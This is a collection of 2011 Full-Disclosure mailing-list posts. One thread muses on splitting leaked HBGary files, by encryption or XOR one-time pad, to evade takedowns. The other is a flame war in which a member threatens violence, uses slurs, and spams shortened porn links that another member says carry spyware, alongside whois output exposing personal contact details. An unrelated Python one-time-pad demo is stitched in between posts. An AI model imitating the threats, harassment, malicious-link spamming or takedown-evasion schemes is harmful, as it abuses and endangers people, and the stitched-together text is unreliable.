2011-02-18 Thread Cal Leeming [Simplicity Media Ltd]
I'm wondering along the same lines as Thor, based on intent. One of those
"don't take the piss or the judge is gonna own you" scenarios that would be
tested in court on a per trial basis. Like, if the files were known to
contain encrypted info, and if it was proved that you knew the contents of
those files, then you would be held liable.

@Charles: luckily for me, this is all academic as I've kept as far away as
possible from this hbgary thing :P

On Fri, Feb 18, 2011 at 6:57 PM, Charles Morris  wrote:

> > Sorry, when I say eligible, I mean "which server would they be allowed to
> > take down by law?".
> > I'm not too hot on the laws of encryption, but I'm sure there is
> something
> > which states that hosting encrypted files are not illegal, it's
> distributing
> > the key which allows you to gain access to those files, which is actually
> > illegal.
> > *DISCLAIMER: I don't know if the above is true or not, so apologies if I
> got
> > this wrong*
> >
>
> Attempt A:
> Cal, I'm not sure on this point off-the-cuff, however encrypted files
> should* be
> indistinguishable from random data, so assuming that even if a given LEE
> has obtained the key and knows that your distributed data is "illegal", you
> could be held blameless as you have no feasible way to know what the data
> was.
>
> Attempt 2:
> You could also consider a key and an algorithm a "transform" for a set of
> random
> bits, such that once the transform is applied to those bits it would
> result in something
> "bad", so you aren't actually distributing "encrypted" "files" at all..
>
> just random bits :D
>
> *DISCLAIMER: The above will PROBABLY NOT hold in court, so apologies
> if you get jailed for life
>

Re: [Full-disclosure] Fwd: HBGary Mirrors?

2011-02-18 Thread Cal Leeming [Simplicity Media Ltd]
Heh, now that would be interesting. I wonder if the "intent" scenario would
apply to this also?

On Fri, Feb 18, 2011 at 6:56 PM, decoder  wrote:

>  I can't answer the question but it would be even more interesting to
> answer this if you're using a One-Time-Pad (i.e. two files of equal size on
> two different servers, both XORed give you the data). There exists a
> mathematical proof that neither of the two files leaks a single bit of
> information about the original data :)
>
>
> Chris
>
>
>
> On 02/18/2011 07:50 PM, Cal Leeming [Simplicity Media Ltd] wrote:
>
> Sorry, when I say eligible, I mean "which server would they be allowed to
> take down by law?".
>
>  I'm not too hot on the laws of encryption, but I'm sure there is
> something which states that hosting encrypted files are not illegal, it's
> distributing the key which allows you to gain access to those files, which
> is actually illegal.
>
>  *DISCLAIMER: I don't know if the above is true or not, so apologies if I
> got this wrong*
>
>
> On Fri, Feb 18, 2011 at 6:46 PM, ck  wrote:
>
> I go with the server hosting the files since the key should be
> significantly smaller than the files and therefore much easier to mirror.
>
> On Fri, Feb 18, 2011 at 7:37 PM, Cal Leeming [Simplicity Media Ltd]
>  wrote:
> > So here's a thought.
> > If illegally distributed files (such as this one) were encrypted and
> hosted
> > on one server, and the key hosted on another, which server would
> > be eligible for take down?
> >
>
>
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
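
The two-file XOR split Chris describes above, as an added example (not code from any post in the thread). It checks the "not a single bit" property exhaustively on a one-byte message space and shows what the proof depends on: a pad drawn from a CSPRNG, as long as the data, and used once. Function names and sample strings are constructed for illustration.

```python
import secrets
from collections import Counter
from typing import Tuple


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings; refuse mismatched lengths."""
    if len(a) != len(b):
        raise ValueError("inputs must be the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def split(data: bytes) -> Tuple[bytes, bytes]:
    """Return (pad, masked): two files of equal size that XOR back to data."""
    pad = secrets.token_bytes(len(data))  # CSPRNG output, one fresh pad per message
    return pad, xor_bytes(data, pad)


def share_distribution(byte_value: int) -> Counter:
    """Count every masked value a one-byte message yields over all 256 pads."""
    return Counter(byte_value ^ pad for pad in range(256))


def pad_explaining(masked: bytes, candidate: bytes) -> bytes:
    """Pad under which `masked` would decode to `candidate` (same length).

    One exists for every candidate, which is why a single file on its own
    does not favour any plaintext over another.
    """
    return xor_bytes(masked, candidate)


def reuse_leak(pad: bytes, first: bytes, second: bytes) -> bytes:
    """What someone holding two masked files learns if one pad masked both."""
    return xor_bytes(xor_bytes(first, pad), xor_bytes(second, pad))


# Constructed sample inputs, not taken from the thread.
SAMPLE = b"meeting moved to 14:00"
OTHER = b"meeting moved to 09:30"

if __name__ == "__main__":
    pad, masked = split(SAMPLE)
    print("recombined:", xor_bytes(pad, masked))

    # Perfect secrecy on a toy message space: the distribution of the masked
    # byte is uniform and identical whatever the message byte was.
    print("same distribution:", share_distribution(0x41) == share_distribution(0x00))

    # The masked file is equally consistent with a different plaintext.
    alt_pad = pad_explaining(masked, OTHER)
    print("alternative decode:", xor_bytes(masked, alt_pad))

    # Caveats: the length is still visible, and reusing the pad cancels it
    # out, exposing the XOR of the two plaintexts (zero where they agree).
    print("length visible:", len(masked))
    print("reuse leak:", reuse_leak(pad, SAMPLE, OTHER).hex())
```

The property holds per file only; anyone holding both files recovers the data, and each file still reveals the data's length.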

[Full-disclosure] Fwd: HBGary Mirrors?

2011-02-18 Thread Cal Leeming [Simplicity Media Ltd]
Sorry, when I say eligible, I mean "which server would they be allowed to
take down by law?".

I'm not too hot on the laws of encryption, but I'm sure there is something
which states that hosting encrypted files are not illegal, it's distributing
the key which allows you to gain access to those files, which is actually
illegal.

*DISCLAIMER: I don't know if the above is true or not, so apologies if I got
this wrong*


On Fri, Feb 18, 2011 at 6:46 PM, ck  wrote:

> I go with the server hosting the files since the key should be
> significantly smaller than the files and therefore much easier to mirror.
>
> On Fri, Feb 18, 2011 at 7:37 PM, Cal Leeming [Simplicity Media Ltd]
>  wrote:
> > So here's a thought.
> > If illegally distributed files (such as this one) were encrypted and
> hosted
> > on one server, and the key hosted on another, which server would
> > be eligible for take down?
> >
>

Re: [Full-disclosure] HBGary Mirrors?

2011-02-18 Thread Cal Leeming [Simplicity Media Ltd]
So here's a thought.

If illegally distributed files (such as this one) were encrypted and hosted
on one server, and the key hosted on another, which server would
be eligible for take down?

On Fri, Feb 18, 2011 at 6:25 PM, Eyeballing Weev
wrote:

> Cryptome.org is your friend. John Young is pretty much bulletproof when
> it comes to file hosting and laughs at DMCA takedown requests.
>
> On 02/18/2011 11:24 AM, ck wrote:
> > So, the FEDs shut down all mirrors of the HBGary files - or didn't they?
> >
> > ck
> >

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-18 Thread Cal Leeming [Simplicity Media Ltd]
"operations centre email system"

LMFAO.

You know what that reminds me of? The fat cunt in Die Hard 3 when he says
"WHAT ARE YOU DOING IN MY COMMAND CENTRE".

Ty for that, just made my day :D

On Fri, Feb 18, 2011 at 4:46 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Fri, Feb 18, 2011 at 4:40 PM, Benji  wrote:
> > This email thread is fucking ridiculous and boring, take it off list or
> > whatever, I don't care, just stop filling up my inbox with your worthless
> > ramblings about porn and battlefrogs 2142.
>
> Like I've been telling him for the last two weeks, our operations centre
> email system is full of his junk mail.
>
> We just want Cal removed from the list, it's that simple... it's not a chat
> forum.
>
> Andrew
>
>

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-18 Thread Cal Leeming [Simplicity Media Ltd]
Shut the fuck up Benji and spam block my email if you're *that* bothered :)

On Fri, Feb 18, 2011 at 4:40 PM, Benji  wrote:

> This email thread is fucking ridiculous and boring, take it off list or
> whatever, I don't care, just stop filling up my inbox with your worthless
> ramblings about porn and battlefrogs 2142.
>
>
> On Fri, Feb 18, 2011 at 4:34 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> LOL why? bf2142 is pretty decent, helps me unwind, else I end up coding
>> all day, every day, whilst not giving my brain chance to dissect the day's
>> events. People have different release methods, some go out drinking every
>> weekend, some drink alcohol at home, some smoke a joint. My release is porn
>> and gaming, it's a hell of a lot healthier than most :D Hell, if I had the
>> time, I'd go military themed airsoft'ing every weekend, but I haven't
>> convinced my girl to go with me yet lol.
>>
>> On Fri, Feb 18, 2011 at 4:28 PM, Christian Sciberras 
>> wrote:
>>
>>> Battlefield 2142? That's it, you're hopeless.
>>>
>>>
>>>
>>>
>>>
>>> On Fri, Feb 18, 2011 at 5:24 PM, Cal Leeming [Simplicity Media Ltd] <
>>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>>
>>>> When it comes to porn, trance, battlefield 2142, coding and sex? No.
>>>> lol.
>>>>
>>>> On Fri, Feb 18, 2011 at 4:22 PM, Paul Schmehl >>> > wrote:
>>>>
>>>>> Ever heard of self control?
>>>>>
>>>>>
>>>>> --On February 18, 2011 12:41:27 PM + "Cal Leeming [Simplicity Media
>>>>> Ltd]"  wrote:
>>>>>
>>>>>
>>>>>> I do see where you are coming from, I really do. But right now, full
>>>>>> disclosure seems to be about whatever anyone wants it to be about.
>>>>>>
>>>>>>
>>>>>> Until this list becomes moderated, the only control any of us have
>>>>>> over
>>>>>> its content, is to block individuals whom we don't wish to receive
>>>>>> mail
>>>>>> from.
>>>>>>
>>>>>
>>>>> --
>>>>> Paul Schmehl, Senior Infosec Analyst
>>>>> As if it wasn't already obvious, my opinions
>>>>> are my own and not those of my employer.
>>>>> ***
>>>>> "It is as useless to argue with those who have
>>>>> renounced the use of reason as to administer
>>>>> medication to the dead." Thomas Jefferson
>>>>> "There are some ideas so wrong that only a very
>>>>> intelligent person could believe in them." George Orwell
>>>>>
>>>>>
>>>>

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-18 Thread Cal Leeming [Simplicity Media Ltd]
LOL why? bf2142 is pretty decent, helps me unwind, else I end up coding all
day, every day, whilst not giving my brain chance to dissect the day's
events. People have different release methods, some go out drinking every
weekend, some drink alcohol at home, some smoke a joint. My release is porn
and gaming, it's a hell of a lot healthier than most :D Hell, if I had the
time, I'd go military themed airsoft'ing every weekend, but I haven't
convinced my girl to go with me yet lol.

On Fri, Feb 18, 2011 at 4:28 PM, Christian Sciberras wrote:

> Battlefield 2142? That's it, you're hopeless.
>
>
>
>
>
> On Fri, Feb 18, 2011 at 5:24 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> When it comes to porn, trance, battlefield 2142, coding and sex? No. lol.
>>
>> On Fri, Feb 18, 2011 at 4:22 PM, Paul Schmehl 
>> wrote:
>>
>>> Ever heard of self control?
>>>
>>>
>>> --On February 18, 2011 12:41:27 PM + "Cal Leeming [Simplicity Media
>>> Ltd]"  wrote:
>>>
>>>
>>>> I do see where you are coming from, I really do. But right now, full
>>>> disclosure seems to be about whatever anyone wants it to be about.
>>>>
>>>>
>>>> Until this list becomes moderated, the only control any of us have over
>>>> its content, is to block individuals whom we don't wish to receive mail
>>>> from.
>>>>
>>>
>>> --
>>> Paul Schmehl, Senior Infosec Analyst
>>> As if it wasn't already obvious, my opinions
>>> are my own and not those of my employer.
>>> ***
>>> "It is as useless to argue with those who have
>>> renounced the use of reason as to administer
>>> medication to the dead." Thomas Jefferson
>>> "There are some ideas so wrong that only a very
>>> intelligent person could believe in them." George Orwell
>>>
>>>
>>

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-18 Thread Cal Leeming [Simplicity Media Ltd]
When it comes to porn, trance, battlefield 2142, coding and sex? No. lol.

On Fri, Feb 18, 2011 at 4:22 PM, Paul Schmehl wrote:

> Ever heard of self control?
>
>
> --On February 18, 2011 12:41:27 PM + "Cal Leeming [Simplicity Media
> Ltd]"  wrote:
>
>
>> I do see where you are coming from, I really do. But right now, full
>> disclosure seems to be about whatever anyone wants it to be about.
>>
>>
>> Until this list becomes moderated, the only control any of us have over
>> its content, is to block individuals whom we don't wish to receive mail
>> from.
>>
>
> --
> Paul Schmehl, Senior Infosec Analyst
> As if it wasn't already obvious, my opinions
> are my own and not those of my employer.
> ***
> "It is as useless to argue with those who have
> renounced the use of reason as to administer
> medication to the dead." Thomas Jefferson
> "There are some ideas so wrong that only a very
> intelligent person could believe in them." George Orwell
>
>

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-18 Thread Cal Leeming [Simplicity Media Ltd]
He always seems to manage to hustle a response out of people though, and has
done since what, 2006-ish? (way before I came onto the list!)

So far he hasn't bothered to badger at the porn posts, because I think he
just doesn't know what to say, it's outside of his comfort zone or
something. Hell it's been 24 hours almost and we haven't heard from him, I'm
getting worried, maybe he's committed suicide :O

On Fri, Feb 18, 2011 at 3:44 PM, <0...@phocean.net> wrote:

> Maybe let's just ignore him ?
> I believe if no one cared at all about what he writes, such a troll
> wouldn't exist.
>
>
> On Fri, 18 Feb 2011 12:41:27 +, Cal Leeming [Simplicity Media Ltd]
> wrote:
>
>> I do see where you are coming from, I really do. But right now, full
>> disclosure seems to be about whatever anyone wants it to be about.
>>
>> Until this list becomes moderated, the only control any of us have over
>> its
>> content, is to block individuals whom we don't wish to receive mail from.
>>
>> Although, Andrew is an exception to this theory, as no one seems to block
>> him. Therefore, my "every cloud has a silver lining" approach seems to be
>> a
>> suitable solution.
>>
>> If you have any better ideas, let's hear em.
>>
>>
>> On Fri, Feb 18, 2011 at 7:18 AM, phocean <0...@phocean.net> wrote:
>>
>>  Then it is their problem but I did not click on any and I am sure (and I
>>> hope) I am not alone.
>>> But I don't even want to debate about it.
>>>
>>> The question is that simple: is FD about security or about porn?
>>>
>>> There are enough porn sites everywhere for people who want porn so I
>>> don't think it is necessary to offend some people here with it (even if
>>> we were minority).
>>>
>>> On Thursday 17 February 2011 at 22:59 +, Cal Leeming [Simplicity Media
>>> Ltd] wrote:
>>> > You do realize that those bit.ly links I posted have had over 200
>>> > clicks on each one, right? (Go check it for yourself if you don't
>>> > believe me)
>>> >
>>> >
>>> > Looks to me like the majority of people on this forum would rather see
>>> > porn, than listen to Andrew's shit.
>>> >
>>> > On Thu, Feb 17, 2011 at 9:44 PM, phocean <0...@phocean.net> wrote:
>>> > I never thought I would agree with Andrew some day, but that's
>>> > done.
>>> >     Don't you understand that you are killing FD or is it what you
>>> > want?
>>> > We are not here for porn! You may be sick and think like
>>> > anyone is like
>>> > you, but believe me, there are people who don't want of it and
>>> > live very
>>> > well without. So respect others and stop this madness.
>>> > By the way, who asked for moderation recently ?
>>> >
>>> > On Thursday 17 February 2011 at 20:13 +, Cal Leeming
>>> > [Simplicity Media
>>> > Ltd] wrote:
>>> >
>>> > > True to my word, here is the first (hopefully of many)
>>> > "every cloud
>>> > > has a silver lining" posts. (everytime Andrew posts more
>>> > faggotry, I
>>> > > will treat you all to decent porn!)
>>> > >
>>> > >
>>> > > I present to you, Gagging Report videos (user submitted!)
>>> > >
>>> > >
>>> > > http://bit.ly/fneO2U
>>> > >
>>> > >
>>> > > Enjoy!
>>> > >
>>> > > On Thu, Feb 17, 2011 at 8:09 PM, andrew.wallace
>>> > >  wrote:
>>> > > Just do yourself a favour, leave the disclosure
>>> > community for
>>> > > good like you've been requested so many times to do.
>>> > >
>>> > > Myself and any law enforcement folks reading the
>>> > list won't
>>> > > bother pursuing your threats of violence further if
>>> > you stop
>>> > > now.
>>> > >
>>> > > It's your choice, the ball i

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-18 Thread Cal Leeming [Simplicity Media Ltd]
I do see where you are coming from, I really do. But right now, full
disclosure seems to be about whatever anyone wants it to be about.

Until this list becomes moderated, the only control any of us have over its
content, is to block individuals whom we don't wish to receive mail from.

Although, Andrew is an exception to this theory, as no one seems to block
him. Therefore, my "every cloud has a silver lining" approach seems to be a
suitable solution.

If you have any better ideas, let's hear em.


On Fri, Feb 18, 2011 at 7:18 AM, phocean <0...@phocean.net> wrote:

> Then it is their problem but I did not click on any and I am sure (and I
> hope) I am not alone.
> But I don't even want to debate about it.
>
> The question is that simple: is FD about security or about porn?
>
> There are enough porn sites everywhere for people who want porn so I
> don't think it is necessary to offend some people here with it (even if
> we were minority).
>
> On Thursday 17 February 2011 at 22:59 +, Cal Leeming [Simplicity Media
> Ltd] wrote:
> > You do realize that those bit.ly links I posted have had over 200
> > clicks on each one, right? (Go check it for yourself if you don't
> > believe me)
> >
> >
> > Looks to me like the majority of people on this forum would rather see
> > porn, than listen to Andrew's shit.
> >
> > On Thu, Feb 17, 2011 at 9:44 PM, phocean <0...@phocean.net> wrote:
> > I never thought I would agree with Andrew some day, but that's
> > done.
> > Don't you understand that you are killing FD or is it what you
> > want?
> > We are not here for porn! You may be sick and think like
> > anyone is like
> > you, but believe me, there are people who don't want of it and
> >     live very
> > well without. So respect others and stop this madness.
> > By the way, who asked for moderation recently ?
> >
> > On Thursday 17 February 2011 at 20:13 +, Cal Leeming
> > [Simplicity Media
> > Ltd] wrote:
> >
> > > True to my word, here is the first (hopefully of many)
> > "every cloud
> > > has a silver lining" posts. (everytime Andrew posts more
> > faggotry, I
> > > will treat you all to decent porn!)
> > >
> > >
> > > I present to you, Gagging Report videos (user submitted!)
> > >
> > >
> > > http://bit.ly/fneO2U
> > >
> > >
> > > Enjoy!
> > >
> > > On Thu, Feb 17, 2011 at 8:09 PM, andrew.wallace
> > >  wrote:
> > > Just do yourself a favour, leave the disclosure
> > community for
> > > good like you've been requested so many times to do.
> > >
> > > Myself and any law enforcement folks reading the
> > list won't
> > > bother pursuing your threats of violence further if
> > you stop
> > > now.
> > >
> > > It's your choice, the ball is completely in your
> > court in
> > > which direction you wish to go in life from now
> > onwards.
> > >
> > > You can stop posting now and get on with the rest of
> > your
> > > career, or you can continue on this same path.
> > >
> > > This list isn't a joke around like you seem to treat
> > it, we
> > > are serious people with serious concerns.
> > >
> > > Andrew
> > >
> > > On Thu, Feb 17, 2011 at 6:24 PM, Cal Leeming
> > [Simplicity Media
> > > Ltd]  wrote:
> > > > Prominent figure? LMFAO.
> > >
> > > >>
> > > >> On Thu, Feb 17, 2011 at 6:19 PM, andrew.wallace
> > > >>  wrote:
> > > >>>
> > > >>> On Thu, Feb 17, 2011 at 6:05 PM, Cal Leeming
> >         [Simplicity
> > > Media Ltd]
> > > >>>  wrote:
> > > >>> > Ah, now this is a different subject entirely

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
Uh, go and do a whois on the office gw and the IP space it's attached to,
and you'll quickly see that this is actually me talking lol.

 f...@courtney.simplicitymedialtd.co.uk [/mnt/encstore/lxc] > host staff.simplicitymedialtd.co.uk
staff.simplicitymedialtd.co.uk has address 94.76.199.238

 f...@courtney.simplicitymedialtd.co.uk [/mnt/encstore/lxc] > whois 94.76.199.238
% This is the RIPE Database query service.
% The objects are in RPSL format.
inetnum:94.76.199.238 - 94.76.199.238
netname:SimplictyMedia-5133
descr:  Simplicty Media Ltd
remarks: ##
remarks:Please report abuse incidents to ab...@simplicitymedialtd.co.uk.
remarks:Messages sent to other contact addresses may not be acted upon.
remarks: ##
person: Cal Leeming
address:Abbey House
address:Manor Road
address:Coventry
address:CV1 2FW
phone:  +44 07534 971120
mnt-by: as29550-mnt
remarks:===
remarks:For abuse related queries, please email
remarks:ab...@simplicitymedialtd.co.uk
remarks:===


On Thu, Feb 17, 2011 at 10:04 PM,  wrote:

> On Thu, 17 Feb 2011 22:44:37 +0100, phocean said:
> > I never thought I would agree with Andrew some day, but that's done.
> > Don't you understand that you are killing FD or is it what you want?
>
> You *do* realize we have very little proof that the entity posting
> as Cal isn't a sock puppet of Andrew's creation, to further his vendetta
> against full disclosure because it helps the cyber-terrorists?  It's the
> sort of thing that one of England's top cyber-security experts would do,
> isn't it? :)
>

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
You do realize that those bit.ly links I posted have had over 200 clicks on
each one, right? (Go check it for yourself if you don't believe me)

Looks to me like the majority of people on this forum would rather see porn,
than listen to Andrew's shit.

On Thu, Feb 17, 2011 at 9:44 PM, phocean <0...@phocean.net> wrote:

> I never thought I would agree with Andrew some day, but that's done.
> Don't you understand that you are killing FD or is it what you want?
> We are not here for porn! You may be sick and think like anyone is like
> you, but believe me, there are people who don't want of it and live very
> well without. So respect others and stop this madness.
> By the way, who asked for moderation recently ?
>
> On Thursday 17 February 2011 at 20:13 +, Cal Leeming [Simplicity Media
> Ltd] wrote:
> > True to my word, here is the first (hopefully of many) "every cloud
> > has a silver lining" posts. (everytime Andrew posts more faggotry, I
> > will treat you all to decent porn!)
> >
> >
> > I present to you, Gagging Report videos (user submitted!)
> >
> >
> > http://bit.ly/fneO2U
> >
> >
> > Enjoy!
> >
> > On Thu, Feb 17, 2011 at 8:09 PM, andrew.wallace
> >  wrote:
> > Just do yourself a favour, leave the disclosure community for
> > good like you've been requested so many times to do.
> >
> > Myself and any law enforcement folks reading the list won't
> > bother pursuing your threats of violence further if you stop
> > now.
> >
> > It's your choice, the ball is completely in your court in
> > which direction you wish to go in life from now onwards.
> >
> > You can stop posting now and get on with the rest of your
> > career, or you can continue on this same path.
> >
> > This list isn't a joke around like you seem to treat it, we
> > are serious people with serious concerns.
> >
> > Andrew
> >
> > On Thu, Feb 17, 2011 at 6:24 PM, Cal Leeming [Simplicity Media
> > Ltd]  wrote:
> > > Prominent figure? LMFAO.
> >
> > >>
> > >> On Thu, Feb 17, 2011 at 6:19 PM, andrew.wallace
> > >>  wrote:
> > >>>
> > >>> On Thu, Feb 17, 2011 at 6:05 PM, Cal Leeming [Simplicity
> > Media Ltd]
> > >>>  wrote:
> > >>> > Ah, now this is a different subject entirely! It suits
> >     some, but not
> > >>> > others.
> > >>>
> > >>> Are you trying to distract the many police forces
> > throughout the UK who
> > >>> are subscribed to the list that you made a threat of
> > violence towards a
> > >>> prominent figure in the security community?
> > >>>
> > >>> On Thu, Feb 17, 2011 at 5:35 PM, Cal Leeming [Simplicity
> > Media Ltd]
> > >>>  wrote:
> > >>> > I hope you turn up at my next conference, so I can slap
> > the fuck out of
> > >>> > you
> > >>> > in front of everyone.
> > >>> > Little bitch like you would probably go running to the
> > police as well.
> > >>>
> > >>> Obviously, criminals are reported to the police. The
> > problem here is,
> > >>> this list is already populated with police forces
> > throughout the UK.
> > >>>
> > >>> They may even ask me to attend the next conference you
> > appear at, and
> > >>> then cuff you as soon as you lay a hand on me.
> > >>>
> > >>> Cal Leeming, the so-called reformed criminal ends up back
> > in court and
> > >>> in front of the media glare.
> > >>>
> > >>> Andrew
> >
> >
> >
> >
> >

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
Ah, yeah motherless aren't very careful with who they allow to advertise on
the site. A decent IDS (Avira on Windows is pretty good) usually stops most
of the nasty drive by kits that end up in there.

2011/2/17 Thor (Hammer of God) 

>  Nice.  Now you are attempting to distribute “Pornpop.A” spyware to us?
> Arse!
>
> t
>
>
>
> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Cal Leeming
> [Simplicity Media Ltd]
> *Sent:* Thursday, February 17, 2011 12:36 PM
> *To:* andrew.wallace
>
> *Cc:* full-disclosure@lists.grok.org.uk
> *Subject:* Re: [Full-disclosure] (this thread is now about porn).‏
>
>
>
> LOL, Andrew at this rate this is gonna turn into full-*dick*losure!
>
>
>
> Here you go /b/rothers:
>
>
>
> http://bit.ly/g4DUr5
>
>
>
> Red head, 19f, not the prettiest painting, but a damn good show.
>
> On Thu, Feb 17, 2011 at 8:30 PM, andrew.wallace <
> andrew.wall...@rocketmail.com> wrote:
>
> On Thu, Feb 17, 2011 at 8:13 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > True to my word, here is the first (hopefully of many) "every cloud has a
> > silver lining" posts. (everytime Andrew posts more faggotry, I will treat
> > you all to decent porn!)
> > I present to you, Gagging Report videos (user submitted!)
> > http://bit.ly/fneO2U
> > Enjoy!
> >
>
> You're just going to end up being arrested for not only making a threat of
> violence, but also spamming the list with unsolicited porn.
>
> I was throwing you a life line but you chose to throw it back in our faces.
>
> Andrew
>
>
>
>
>

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
LOL, Andrew at this rate this is gonna turn into full-*dick*losure!

Here you go /b/rothers:

http://bit.ly/g4DUr5

Red head, 19f, not the prettiest painting, but a damn good show.

On Thu, Feb 17, 2011 at 8:30 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Thu, Feb 17, 2011 at 8:13 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > True to my word, here is the first (hopefully of many) "every cloud has a
> > silver lining" posts. (everytime Andrew posts more faggotry, I will treat
> > you all to decent porn!)
> > I present to you, Gagging Report videos (user submitted!)
> > http://bit.ly/fneO2U
> > Enjoy!
> >
>
> You're just going to end up being arrested for not only making a threat of
> violence, but also spamming the list with unsolicited porn.
>
> I was throwing you a life line but you chose to throw it back in our faces.
>
> Andrew
>
>

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
True to my word, here is the first (hopefully of many) "every cloud has a
silver lining" posts. (everytime Andrew posts more faggotry, I will treat
you all to decent porn!)

I present to you, Gagging Report videos (user submitted!)

http://bit.ly/fneO2U

Enjoy!

On Thu, Feb 17, 2011 at 8:09 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> Just do yourself a favour, leave the disclosure community for good like
> you've been requested so many times to do.
>
> Myself and any law enforcement folks reading the list won't bother pursuing
> your threats of violence further if you stop now.
>
> It's your choice, the ball is completely in your court in which direction
> you wish to go in life from now onwards.
>
> You can stop posting now and get on with the rest of your career, or you
> can continue on this same path.
>
> This list isn't a joke around like you seem to treat it, we are serious
> people with serious concerns.
>
> Andrew
>
> On Thu, Feb 17, 2011 at 6:24 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > Prominent figure? LMFAO.
>
> >>
> >> On Thu, Feb 17, 2011 at 6:19 PM, andrew.wallace
> >>  wrote:
> >>>
> >>> On Thu, Feb 17, 2011 at 6:05 PM, Cal Leeming [Simplicity Media Ltd]
> >>>  wrote:
> >>> > Ah, now this is a different subject entirely! It suits some, but not
> >>> > others.
> >>>
> >>> Are you trying to distract the many police forces throughout the UK who
> >>> are subscribed to the list that you made a threat of violence towards a
> >>> prominent figure in the security community?
> >>>
> >>> On Thu, Feb 17, 2011 at 5:35 PM, Cal Leeming [Simplicity Media Ltd]
> >>>  wrote:
> >>> > I hope you turn up at my next conference, so I can slap the fuck out
> of
> >>> > you
> >>> > in front of everyone.
> >>> > Little bitch like you would probably go running to the police as
> well.
> >>>
> >>> Obviously, criminals are reported to the police. The problem here is,
> >>> this list is already populated with police forces throughout the UK.
> >>>
> >>> They may even ask me to attend the next conference you appear at, and
> >>> then cuff you as soon as you lay a hand on me.
> >>>
> >>> Cal Leeming, the so-called reformed criminal ends up back in court and
> >>> infront of the media glare.
> >>>
> >>> Andrew
>
>

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
HOLY SHIT.

Most awesome idea ever.

Every time Andrew posts, I'll respond with more epic porn clips, each more
shocking than the last. For every cloud has a silver lining? :D

On Thu, Feb 17, 2011 at 6:19 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Thu, Feb 17, 2011 at 6:05 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > Ah, now this is a different subject entirely! It suits some, but not
> > others.
>
> Are you trying to distract the many police forces throughout the UK who are
> subscribed to the list that you made a threat of violence towards a
> prominent figure in the security community?
>
> On Thu, Feb 17, 2011 at 5:35 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > I hope you turn up at my next conference, so I can slap the fuck out of
> you
> > in front of everyone.
> > Little bitch like you would probably go running to the police as well.
>
> Obviously, criminals are reported to the police. The problem here is, this
> list is already populated with police forces throughout the UK.
>
> They may even ask me to attend the next conference you appear at, and then
> cuff you as soon as you lay a hand on me.
>
> Cal Leeming, the so-called reformed criminal ends up back in court and
> infront of the media glare.
>
> Andrew
>
>
>

Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-17 Thread Cal Leeming [Simplicity Media Ltd]
Seems this has now gone very very very far off topic.

Here's two more great links:

(non porn but amusing) http://bit.ly/e7duHa
(great episode (tecey) from facialabuse) http://bit.ly/fTXhF6
(another great episode from facialabuse) http://bit.ly/fgrMb7

Embrace it /b/rothers :D

On Thu, Feb 17, 2011 at 6:05 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> Ah, now this is a different subject entirely! It suits some, but not
> others.
>
> Personally, I think there's nothing better (porn wise) than seeing the sad
> look on a dumb broads face after she realized what she's just done. Or even
> better, the constant sad look on her face when she's doing the scene, and
> you know she's only doing it for the money, and that it's her first time,
> and probably her last. Mind you, working on facialabuse.com has pretty
> much desensitized me to *everything* (check out the Tecey video, classic
> example!). Maybe check out the front page video for 
> http://bit.ly/1KTVJv(xxxlubetube), I gotta admit that did kinda make me go 
> "eww".
>
> And another thing, no matter how bad a recession is, there will *always* be
> a market for sex and porn. No matter if someone loses their job, their home,
> their wife and kids etc, their hand and the internet will be a steady friend
> for them. It helps save marriages because it gives the individual a means of
> escape and fantasy, without resorting to cheating.
>
>
>
> On Thu, Feb 17, 2011 at 5:56 PM, phocean <0...@phocean.net> wrote:
>
>> If so, I sincerely feel sorry for you :(
>> This shit can really destroy your life if you are not careful and loose
>> sight of important things of life. Good luck !
>>
>> Le jeudi 17 février 2011 à 17:47 +, Cal Leeming [Simplicity Media
>> Ltd] a écrit :
>> > Considering for the last 18 months my work has been primarily in adult
>> > content, and I have to deal with sexual/immature/aggressive bullshit
>> > on a daily basis, I think this was a reasonable response. lol.
>> >
>>
>>
>

Re: [Full-disclosure] (this thread is now about porn).‏

